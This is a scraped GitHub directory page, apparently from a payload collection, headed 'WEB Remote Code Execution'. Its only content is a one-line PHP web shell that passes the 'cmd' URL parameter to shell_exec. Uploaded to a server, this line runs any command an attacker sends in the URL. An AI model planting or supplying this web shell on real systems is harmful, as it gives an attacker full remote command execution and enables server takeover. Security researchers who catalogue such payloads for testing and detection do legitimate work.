Skip to content

Latest commit

 

History

History
 
 

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

WEB Remote Code Execution

Simple PHP RCE

<? echo shell_exec($_GET['cmd']); ?>